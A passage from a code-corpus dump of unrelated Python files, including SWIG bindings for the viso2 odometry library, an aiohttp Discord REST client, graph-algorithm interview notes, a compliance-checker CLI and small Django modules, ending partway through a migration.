last_idx = _swig_property(_viso2.track_last_idx_get, _viso2.track_last_idx_set)
def __init__(self):
"""__init__(self) -> track"""
this = _viso2.new_track()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_track
__del__ = lambda self: None
track_swigregister = _viso2.track_swigregister
track_swigregister(track)
class MatchVector(_object):
"""Proxy of C++ std::vector<(Matcher::p_match)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, MatchVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, MatchVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.MatchVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.MatchVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.MatchVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> MatchVector"""
return _viso2.MatchVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.MatchVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.MatchVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.MatchVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> MatchVector
__getitem__(self, i) -> p_match
"""
return _viso2.MatchVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.MatchVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> p_match"""
return _viso2.MatchVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.MatchVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.MatchVector_empty(self)
def size(self):
"""size(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.MatchVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_begin(self)
def end(self):
"""end(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.MatchVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Matcher::p_match >::allocator_type"""
return _viso2.MatchVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.MatchVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Matcher::p_match >::iterator
erase(self, first, last) -> std::vector< Matcher::p_match >::iterator
"""
return _viso2.MatchVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> MatchVector
__init__(self, arg2) -> MatchVector
__init__(self, size) -> MatchVector
__init__(self, size, value) -> MatchVector
"""
this = _viso2.new_MatchVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.MatchVector_push_back(self, x)
def front(self):
"""front(self) -> p_match"""
return _viso2.MatchVector_front(self)
def back(self):
"""back(self) -> p_match"""
return _viso2.MatchVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.MatchVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.MatchVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Matcher::p_match >::iterator
insert(self, pos, n, x)
"""
return _viso2.MatchVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.MatchVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_capacity(self)
__swig_destroy__ = _viso2.delete_MatchVector
__del__ = lambda self: None
MatchVector_swigregister = _viso2.MatchVector_swigregister
MatchVector_swigregister(MatchVector)
class Point3dVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::point3d)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Point3dVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Point3dVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.Point3dVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.Point3dVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.Point3dVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> Point3dVector"""
return _viso2.Point3dVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.Point3dVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.Point3dVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.Point3dVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> Point3dVector
__getitem__(self, i) -> point3d
"""
return _viso2.Point3dVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.Point3dVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> point3d"""
return _viso2.Point3dVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.Point3dVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.Point3dVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.Point3dVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.Point3dVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::point3d >::allocator_type"""
return _viso2.Point3dVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.Point3dVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::point3d >::iterator
erase(self, first, last) -> std::vector< Reconstruction::point3d >::iterator
"""
return _viso2.Point3dVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> Point3dVector
__init__(self, arg2) -> Point3dVector
__init__(self, size) -> Point3dVector
__init__(self, size, value) -> Point3dVector
"""
this = _viso2.new_Point3dVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.Point3dVector_push_back(self, x)
def front(self):
"""front(self) -> point3d"""
return _viso2.Point3dVector_front(self)
def back(self):
"""back(self) -> point3d"""
return _viso2.Point3dVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.Point3dVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.Point3dVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::point3d >::iterator
insert(self, pos, n, x)
"""
return _viso2.Point3dVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.Point3dVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_capacity(self)
__swig_destroy__ = _viso2.delete_Point3dVector
__del__ = lambda self: None
Point3dVector_swigregister = _viso2.Point3dVector_swigregister
Point3dVector_swigregister(Point3dVector)
class TrackVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::track)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, TrackVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, TrackVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.TrackVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.TrackVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.TrackVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> TrackVector"""
return _viso2.TrackVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.TrackVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.TrackVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.TrackVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> TrackVector
__getitem__(self, i) -> track
"""
return _viso2.TrackVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.TrackVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> track"""
return _viso2.TrackVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.TrackVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.TrackVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.TrackVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.TrackVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::track >::allocator_type"""
return _viso2.TrackVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.TrackVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::track >::iterator
erase(self, first, last) -> std::vector< Reconstruction::track >::iterator
"""
return _viso2.TrackVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> TrackVector
__init__(self, arg2) -> TrackVector
__init__(self, size) -> TrackVector
__init__(self, size, value) -> TrackVector
"""
this = _viso2.new_TrackVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.TrackVector_push_back(self, x)
def front(self):
"""front(self) -> track"""
return _viso2.TrackVector_front(self)
def back(self):
"""back(self) -> track"""
return _viso2.TrackVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.TrackVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.TrackVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::track >::iterator
insert(self, pos, n, x)
"""
return _viso2.TrackVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.TrackVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_capacity(self)
__swig_destroy__ = _viso2.delete_TrackVector
__del__ = lambda self: None
TrackVector_swigregister = _viso2.TrackVector_swigregister
TrackVector_swigregister(TrackVector)
# This file is compatible with both classic and new-style classes.
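# --- Usage sketch (illustrative; not part of the generated bindings) ---
# Rough outline of how the Reconstruction proxy above might be driven. The
# calibration numbers and the source of `matches`/`pose` are placeholders;
# `matches` is expected to be a MatchVector and `pose` a Matrix per frame.
#
#   recon = Reconstruction()
#   recon.setCalibration(645.2, 635.9, 194.1)               # f, cu, cv
#   for matches, pose in frames:
#       recon.update(matches, pose, point_type=1, min_track_length=2)
#   for p in recon.getPoints():                              # Point3dVector
#       print(p.x, p.y, p.z)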
Yandawl/restcord.py | restcord/http.py | eeaf75f4a3d05f3837906a60d5f4a9395c4933ff | # -*- coding: utf-8 -*-
import asyncio
import datetime
import json
import logging
import sys
from typing import Optional
import aiohttp
from aiohttp import ClientSession
from . import __version__
from .errors import (
BadGateway,
BadRequest,
Forbidden,
HTTPException,
InternalServerError,
NotFound,
RateLimited
)
__log__ = logging.getLogger(__name__)
__all__ = (
'Route',
'HTTPClient'
)
class Route:
BASE = 'https://discord.com/api'
def __init__(self, method, path):
self.path = path
self.method = method
self.url = (self.BASE + self.path)
class HTTPClient:
__slots__ = ('token', 'loop', 'proxy', 'proxy_auth', '__session', '__agent')
def __init__(self, token: str, loop=None, proxy=None, proxy_auth=None, session: Optional[ClientSession] = None) -> None:
self.token = token
self.loop = asyncio.get_event_loop() if loop is None else loop
self.proxy = proxy
self.proxy_auth = proxy_auth
self.__session = session
self.__agent = f'RestCord.py (https://github.com/Yandawl/restcord.py {__version__}) Python/{sys.version_info[0]}.{sys.version_info[1]} aiohttp/{aiohttp.__version__}'
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.close()
@property
def session(self) -> ClientSession:
""":class:`ClientSession`: The aiohttp ClientSession."""
if self.__session is None or self.__session.closed:
self.__session = ClientSession()
return self.__session
async def close(self):
if self.__session:
await self.__session.close()
async def _request(self, route: Route, **kwargs):
method = route.method
url = route.url
kwargs['headers'] = {
'User-Agent': self.__agent,
'X-Ratelimit-Precision': 'millisecond',
'Authorization': f'Bot {self.token}'
}
if 'json' in kwargs:
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = self.__to_json(kwargs.pop('json'))
if self.proxy is not None:
kwargs['proxy'] = self.proxy
if self.proxy_auth is not None:
kwargs['proxy_auth'] = self.proxy_auth
async with self.session.request(method, url, **kwargs) as r:
__log__.debug(f'{method} {url} with {kwargs.get("data")} has returned {r.status}')
data = await self.__get_data(r)
remaining = r.headers.get('X-Ratelimit-Remaining')
if remaining == '0' and r.status != 429:
__log__.debug(f'A rate limit bucket has been exhausted (retry: {self.__parse_ratelimit_header(r)}).')
if 300 > r.status >= 200:
__log__.debug(f'{method} {url} has received {data}')
return data
if r.status == 429:
raise RateLimited(r, data)
if r.status == 400:
raise BadRequest(r, data)
if r.status == 403:
raise Forbidden(r, data)
if r.status == 404:
raise NotFound(r, data)
if r.status == 500:
raise InternalServerError(r, data)
if r.status == 502:
raise BadGateway(r, data)
raise HTTPException(r, data)
async def __get_data(self, response):
text = await response.text(encoding='utf-8')
try:
if response.headers['content-type'] == 'application/json':
return json.loads(text)
except KeyError:
pass
return text
def __parse_ratelimit_header(self, request, *, use_clock=False):
reset_after = request.headers.get('X-Ratelimit-Reset-After')
if use_clock or not reset_after:
utc = datetime.timezone.utc
now = datetime.datetime.now(utc)
reset = datetime.datetime.fromtimestamp(float(request.headers['X-Ratelimit-Reset']), utc)
return (reset - now).total_seconds()
else:
return float(reset_after)
def __to_json(self, obj):
return json.dumps(obj, separators=(',', ':'), ensure_ascii=True)
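# --- Usage sketch (illustrative; not part of this module) ---
# How the client above might be exercised. The endpoint path is a placeholder,
# and calling the internal _request helper directly is only for demonstration.
#
#   async def demo(token):
#       async with HTTPClient(token) as http:
#           data = await http._request(Route('GET', '/users/@me'))
#           print(data)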
Anmol-Singh-Jaggi/interview-notes | notes/algo-ds-practice/problems/graph/mother_vertex.py | 65af75e2b5725894fa5e13bb5cd9ecf152a0d652 | '''
What is a Mother Vertex?
A mother vertex in a graph G = (V, E) is a vertex v such that every other vertex in G can be reached by a path from v.
How do we find a mother vertex?
Case 1 - Undirected Connected Graph: every vertex is a mother vertex, since from any vertex we can reach all the other nodes in the graph.
Case 2 - Undirected/Directed Disconnected Graph: there is no mother vertex, since no vertex can reach all the other nodes in the graph.
Case 3 - Directed Connected Graph: we have to find a vertex v such that every other node in the graph is reachable from it through a directed path.
SOLUTION:
If a mother vertex (or vertices) exists, then one of the mother vertices is the last finished vertex in a DFS traversal (equivalently, a mother vertex has the maximum finish time in DFS).
A vertex is said to be finished in DFS when the recursive call for its DFS returns, i.e. all descendants of the vertex have been visited.
Algorithm:
1. Do a DFS traversal of the given graph, keeping track of the last finished vertex v. This step takes O(V+E) time.
2. If a mother vertex (or vertices) exists, then v must be one of them. Check that v really is a mother vertex by doing a DFS/BFS from v. This step also takes O(V+E) time.
Note that there is no need to literally store the finish time of each vertex.
In the outer DFS loop we can just do the following (a complete runnable version is sketched after this docstring):
...
...
if node not in visited:
dfs(node)
latest = node
...
...
# Check if latest is indeed a mother vertex.
'''
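# --- Illustrative implementation (not part of the original notes) ---
# A minimal runnable sketch of the approach described above, assuming the
# graph is given as an adjacency list {vertex: [neighbours]} over the
# vertices 0 .. num_vertices - 1.
def find_mother_vertex(graph, num_vertices):
    def dfs(start, visited):
        stack = [start]
        while stack:
            node = stack.pop()
            if node not in visited:
                visited.add(node)
                stack.extend(graph.get(node, []))
    visited = set()
    latest = None
    for node in range(num_vertices):
        if node not in visited:
            dfs(node, visited)
            latest = node  # candidate: last vertex from which a fresh DFS was started
    # Verify the candidate: it is a mother vertex only if it reaches every vertex.
    reachable = set()
    dfs(latest, reachable)
    return latest if len(reachable) == num_vertices else None
if __name__ == '__main__':
    g = {0: [1], 1: [2], 2: [], 3: [0]}  # 3 -> 0 -> 1 -> 2
    print(find_mother_vertex(g, 4))  # expected output: 3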
MoShitrit/kubernetes-controller-example | app/config.py | 210a75ddf9c423c55be248ed21f2b6dea160a782 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
class Config:
api_group = os.environ.get('API_GROUP', 'hello-k8s.s5t.dev')
auth_method = os.environ.get("AUTH_METHOD", "cluster")
examples_plural = os.environ.get('API_PLURAL', 'examples')
examples_version = os.environ.get('API_VERSION', 'v1alpha1')
log_level = os.environ.get("LOG_LEVEL", "INFO")
namespace = os.environ.get('NAMESPACE', 'default')
version = '1.0.0'
def main():
pass
if __name__ == "__main__":
main()
greenie-msft/mechanical-markdown | mechanical_markdown/parsers.py | 4fb410a34038fab7d270383561726dd4da7a2aca |
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT License.
"""
import re
import yaml
from html.parser import HTMLParser
from mistune import Renderer
from mechanical_markdown.step import Step
start_token = 'STEP'
end_token = 'END_STEP'
ignore_links_token = 'IGNORE_LINKS'
end_ignore_links_token = 'END_IGNORE'
class MarkdownAnnotationError(Exception):
pass
class HTMLCommentParser(HTMLParser):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.comment_text = ""
def handle_comment(self, comment):
self.comment_text += comment
class RecipeParser(Renderer):
def __init__(self, shell, **kwargs):
super().__init__(**kwargs)
self.current_step = None
self.all_steps = []
self.external_links = []
self.ignore_links = False
self.shell = shell
def block_code(self, text, lang):
if (lang is not None and lang.strip() in ('bash', 'sh', 'shell-script', 'shell')
and self.current_step is not None):
self.current_step.add_command_block(text)
return ""
def block_html(self, text):
comment_parser = HTMLCommentParser()
comment_parser.feed(text)
comment_body = comment_parser.comment_text
if comment_body.find(end_token) >= 0:
if self.current_step is None:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_token))
self.all_steps.append(self.current_step)
self.current_step = None
return ""
elif comment_body.find(ignore_links_token) >= 0:
if self.ignore_links:
raise MarkdownAnnotationError(f"Duplicate <!-- {ignore_links_token} --> found")
self.ignore_links = True
elif comment_body.find(end_ignore_links_token) >= 0:
if not self.ignore_links:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_ignore_links_token))
self.ignore_links = False
start_pos = comment_body.find(start_token)
if start_pos < 0:
return ""
if self.current_step is not None:
raise MarkdownAnnotationError(f"<!-- {start_token} --> found while still processing previous step")
start_pos += len(start_token)
self.current_step = Step(yaml.safe_load(comment_body[start_pos:]), self.shell)
return ""
def link(self, link, text=None, title=None):
if re.match("https?://", link) is not None:
            self.external_links.append((link, self.ignore_links))
        return ""
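# --- Usage sketch (illustrative; not part of this module) ---
# How the renderer above might be driven. mistune.Markdown(renderer=...) is
# assumed to match the installed mistune 0.x API, and `markdown_text` is
# whatever annotated document you want to process.
#
#   import mistune
#   parser = RecipeParser(shell='bash')
#   mistune.Markdown(renderer=parser)(markdown_text)
#   for step in parser.all_steps:
#       ...  # each Step carries the shell commands found between STEP markers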
jakepolatty/compliance-checker | cchecker.py | 89d362c0616df0267a6a14227fdb9a05daada28e | #!/usr/bin/env python
from __future__ import print_function
import argparse
import sys
from compliance_checker.runner import ComplianceChecker, CheckSuite
from compliance_checker.cf.util import download_cf_standard_name_table
from compliance_checker import __version__
def main():
# Load all available checker classes
check_suite = CheckSuite()
check_suite.load_all_available_checkers()
parser = argparse.ArgumentParser()
parser.add_argument('--test', '-t', '--test=', '-t=', default=[],
action='append',
help=("Select the Checks you want to perform. Defaults to 'acdd'"
" if unspecified. Versions of standards can be specified via "
"`-t <test_standard>:<version>`. If `<version>` is omitted, or "
"is \"latest\", the latest version of the test standard is used."))
parser.add_argument('--criteria', '-c',
help=("Define the criteria for the checks. "
"Either Strict, Normal, or Lenient. Defaults to Normal."),
nargs='?', default='normal',
choices=['lenient', 'normal', 'strict'])
parser.add_argument('--verbose', '-v',
help="Increase output. May be specified up to three times.",
action="count",
default=0)
parser.add_argument('--skip-checks', '-s',
help="Specifies tests to skip",
action='append')
parser.add_argument('-f', '--format', default=[], action='append',
help=("Output format(s). Options are 'text', 'html', 'json', 'json_new'."
" The difference between the 'json' and the 'json_new'"
" formats is that the 'json' format has the check as the top level"
" key, whereas the 'json_new' format has the dataset name(s) as the"
" main key in the output follow by any checks as subkeys. Also, "
"'json' format can be only be run against one input file, whereas "
"'json_new' can be run against multiple files."))
parser.add_argument('-o', '--output', default=[], action='append',
help=("Output filename(s). If '-' is supplied, output to stdout."
" Can either be one or many files. If one file is supplied,"
" but the checker is run against many files, all the output"
" from the checks goes to that file (does not presently work "
"with 'json' format). If more than one output file is "
"supplied, the number of input datasets supplied must match "
"the number of output files."))
parser.add_argument('-V', '--version', action='store_true',
help='Display the IOOS Compliance Checker version information.')
parser.add_argument('dataset_location', nargs='*',
help="Defines the location of the dataset to be checked.")
parser.add_argument('-l', '--list-tests', action='store_true',
help='List the available tests')
parser.add_argument('-d', '--download-standard-names',
help=("Specify a version of the cf standard name table"
" to download as packaged version"))
args = parser.parse_args()
if args.version:
print("IOOS compliance checker version %s" % __version__)
return 0
if args.list_tests:
print("IOOS compliance checker available checker suites:")
for checker in sorted(check_suite.checkers.keys()):
version = getattr(check_suite.checkers[checker],
'_cc_checker_version', "???")
if args.verbose:
print(" - {} (v{})".format(checker, version))
elif ':' in checker and not checker.endswith(':latest'): # Skip the "latest" output
print(" - {}".format(checker))
return 0
if args.download_standard_names:
download_cf_standard_name_table(args.download_standard_names)
# Check the number of output files
if not args.output:
args.output = '-'
output_len = len(args.output)
if not (output_len == 1 or output_len == len(args.dataset_location)):
print('The number of output files must either be one or the same as the number of datasets', file=sys.stderr)
sys.exit(2)
# Check the output formats
format_choices = ['text', 'html', 'json', 'json_new']
for out_format in args.format:
if out_format not in format_choices:
print(("Error: argument -f/--format: invalid choice: '{}'"
" (choose from 'text', 'html', 'json', 'json_new')".format(out_format)))
sys.exit(2)
# Run the compliance checker
# 2 modes, concatenated output file or multiple output files
return_values = []
had_errors = []
if output_len == 1:
if args.format != 'json':
print("Running Compliance Checker on the datasets from: {}".format(args.dataset_location), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker(args.dataset_location,
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
args.output[0],
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
else:
for output, dataset in zip(args.output, args.dataset_location):
if args.format != 'json':
print("Running Compliance Checker on the dataset from: {}".format(dataset), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker([dataset],
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
output,
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
if any(had_errors):
return 2
if all(return_values):
return 0
return 1
if __name__ == "__main__":
sys.exit(main())
| [((343, 355), 'compliance_checker.runner.CheckSuite', 'CheckSuite', ([], {}), '()\n', (353, 355), False, 'from compliance_checker.runner import ComplianceChecker, CheckSuite\n'), ((416, 441), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (439, 441), False, 'import argparse\n'), ((4343, 4404), 'compliance_checker.cf.util.download_cf_standard_name_table', 'download_cf_standard_name_table', (['args.download_standard_names'], {}), '(args.download_standard_names)\n', (4374, 4404), False, 'from compliance_checker.cf.util import download_cf_standard_name_table\n'), ((4729, 4740), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (4737, 4740), False, 'import sys\n'), ((5449, 5621), 'compliance_checker.runner.ComplianceChecker.run_checker', 'ComplianceChecker.run_checker', (['args.dataset_location', "(args.test or ['acdd'])", 'args.verbose', 'args.criteria', 'args.skip_checks', 'args.output[0]', "(args.format or ['text'])"], {}), "(args.dataset_location, args.test or ['acdd'],\n args.verbose, args.criteria, args.skip_checks, args.output[0], args.\n format or ['text'])\n", (5478, 5621), False, 'from compliance_checker.runner import ComplianceChecker, CheckSuite\n'), ((5086, 5097), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (5094, 5097), False, 'import sys\n'), ((6320, 6468), 'compliance_checker.runner.ComplianceChecker.run_checker', 'ComplianceChecker.run_checker', (['[dataset]', "(args.test or ['acdd'])", 'args.verbose', 'args.criteria', 'args.skip_checks', 'output', "(args.format or ['text'])"], {}), "([dataset], args.test or ['acdd'], args.\n verbose, args.criteria, args.skip_checks, output, args.format or ['text'])\n", (6349, 6468), False, 'from compliance_checker.runner import ComplianceChecker, CheckSuite\n')] |
creimers/djangocms-delete-error | apps/articles/cms_apps.py | f38b8a7a277d98060a2b04d9552f26eff3c1c552 | from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import gettext as _
class CategoriesAppHook(CMSApp):
name = _("Categories")
def get_urls(self, page=None, language=None, **kwargs):
return ["apps.articles.urls"]
apphook_pool.register(CategoriesAppHook)
| [((287, 327), 'cms.apphook_pool.apphook_pool.register', 'apphook_pool.register', (['CategoriesAppHook'], {}), '(CategoriesAppHook)\n', (308, 327), False, 'from cms.apphook_pool import apphook_pool\n'), ((170, 185), 'django.utils.translation.gettext', '_', (['"""Categories"""'], {}), "('Categories')\n", (171, 185), True, 'from django.utils.translation import gettext as _\n')] |
sourcelair/bouncer-api | bouncer/blacklist/signals.py | 132c63bbd470b0635054ad71656d0303b39ee421 | from django.db.models.signals import pre_save
from django.dispatch import receiver
from blacklist import models
from hashlib import sha256
@receiver(pre_save, sender=models.EmailEntry)
def email_entry_handler(sender, instance, **kwargs):
"""
    Handler that assigns entry_value.lower() to lower_case_entry_value and stores its SHA-256 hash in hashed_value.
"""
instance.lower_case_entry_value = instance.entry_value.lower()
email_hasher = sha256(instance.lower_case_entry_value.encode())
instance.hashed_value = email_hasher.hexdigest().lower()
@receiver(pre_save, sender=models.IPEntry)
@receiver(pre_save, sender=models.EmailHostEntry)
def entry_handler(instance, **kwargs):
"""
    Handler that assigns entry_value.lower() to lower_case_entry_value.
"""
instance.lower_case_entry_value = instance.entry_value.lower()
| [((142, 186), 'django.dispatch.receiver', 'receiver', (['pre_save'], {'sender': 'models.EmailEntry'}), '(pre_save, sender=models.EmailEntry)\n', (150, 186), False, 'from django.dispatch import receiver\n'), ((531, 572), 'django.dispatch.receiver', 'receiver', (['pre_save'], {'sender': 'models.IPEntry'}), '(pre_save, sender=models.IPEntry)\n', (539, 572), False, 'from django.dispatch import receiver\n'), ((574, 622), 'django.dispatch.receiver', 'receiver', (['pre_save'], {'sender': 'models.EmailHostEntry'}), '(pre_save, sender=models.EmailHostEntry)\n', (582, 622), False, 'from django.dispatch import receiver\n')] |
collaer/boardgames | app/boardgames/migrations/0001_initial.py | 51dd9ec257e5d5bab23a88b10a5f91fdd7fe4210 | # Generated by Django 3.1 on 2020-08-22 17:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BoardGame',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('eidtion_year', models.IntegerField()),
('designer', models.CharField(max_length=30)),
('game_duration_min', models.IntegerField()),
('player_number', models.IntegerField()),
